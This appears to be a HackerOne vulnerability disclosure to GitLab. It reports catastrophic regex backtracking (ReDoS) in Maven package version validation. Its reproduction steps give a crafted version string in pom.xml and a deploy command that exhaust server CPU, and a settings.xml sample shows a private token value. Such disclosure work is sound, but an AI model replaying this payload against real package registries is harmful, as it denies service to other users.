Maven package version ReDoS
HackerOne report #997961 by anyday
on 2020-10-05, assigned to @ngeorge1:
Report | Attachments | How To Reproduce
Report
Hello,
Maven package version check https://docs.gitlab.com/ee/user/packages/maven_repository/#version-validation contains catastrophic backtracking : aaaa....!
(!32925 (merged))
Steps to reproduce:
Follow Maven guide https://docs.gitlab.com/ee/user/packages/maven_repository/
-
generate project
mvn archetype:generate -DgroupId=com.mycompany.mydepartment -DartifactId=my-project -DarchetypeArtifactId=maven-archetype-quickstart -DinteractiveMode=false
-
create
settings.xml
with your access token (eg at/root/.m2/settings.xml
)
<settings>
<servers>
<server>
<id>gitlab-maven</id>
<configuration>
<httpHeaders>
<property>
<name>Private-Token</name>
<value>srzc2-M3ysZx-ZEKQRki</value>
</property>
</httpHeaders>
</configuration>
</server>
</servers>
</settings>
Edit pom.xml
with
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>com.mycompany.mydepartment</groupId>
<artifactId>my-project</artifactId>
<packaging>jar</packaging>
<version>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!/x</version><!-- regular expression denial of service -->
<name>my-project</name>
<url>http://maven.apache.org</url>
<dependencies>
<dependency>
<groupId>junit</groupId>
<artifactId>junit</artifactId>
<version>3.8.1</version>
<scope>test</scope>
</dependency>
</dependencies>
<properties><!-- Maven was complaining about something -->
<maven.compiler.source>6</maven.compiler.source>
<maven.compiler.target>6</maven.compiler.target>
</properties>
<repositories><!------------------------------------------------------------ replace(3) 'gitlab.com' and 'PROJECT_ID' -->
<repository>
<id>gitlab-maven</id>
<url>https://gitlab.com/api/v4/packages/maven</url>
</repository>
</repositories>
<distributionManagement>
<repository>
<id>gitlab-maven</id>
<url>https://gitlab.com/api/v4/projects/PROJECT_ID/packages/maven</url>
</repository>
<snapshotRepository>
<id>gitlab-maven</id>
<url>https://gitlab.com/api/v4/projects/PROJECT_ID/packages/maven</url>
</snapshotRepository>
</distributionManagement>
</project>
mvn deploy
Video:
mvn_redos.mp4
Impact
Denial of service, CPU exhaustion
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: